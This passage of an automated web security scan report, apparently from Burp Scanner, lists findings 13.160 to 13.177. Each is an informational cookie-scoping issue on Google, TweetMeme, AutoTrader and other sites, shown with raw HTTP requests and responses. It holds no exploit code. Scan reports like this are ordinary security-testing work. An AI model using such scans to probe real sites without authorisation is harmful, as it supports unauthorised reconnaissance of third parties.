Set-Cookie: bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:07:11 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.160. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

13.161. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.162. http://ugg.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ugg.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:02:16 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0046799182891846
X-Served-In: 1.2870261669159
X-Served-By: h03
Content-Length: 40013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.163. http://video.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:02:42 GMT
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

13.164. http://video.google.com/videosearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/videosearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: http://video.google.com/
Set-Cookie: PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 14:02:22 GMT
Server: VSFE_1.0
Content-Length: 221
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://video.google.com/">here</
...[SNIP]...

13.165. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.166. http://www.automotive.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.automotive.com
Path:	/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.automotive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 24 Jan 2011 16:04:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.automotive.com/x22/index.html
Set-Cookie: ASP.NET_SessionId=ru5vzmel1nvlrbjo404j0i55; path=/; HttpOnly
Set-Cookie: UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/
Cache-Control: private
Content-Length: 0

13.167. http://www.autotrader.com/fyc/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/fyc/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.168. http://www.autotrader.com/hornav/trader/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache
Set-Cookie: v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1552474122.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.169. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0001_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1737023498.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.170. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0002_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1317593098.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.171. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0005_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1653137418.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.172. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0006_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2022236170.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.173. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0009_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2575884298.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.174. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0016_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1250484234.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

13.175. http://www.autotrader.com/research/certified-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/certified-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:25 GMT
Server: Apache
Set-Cookie: v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.176. http://www.autotrader.com/research/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache
Set-Cookie: v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1971904522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.177. http://www.autotrader.com/research/new-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/new-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
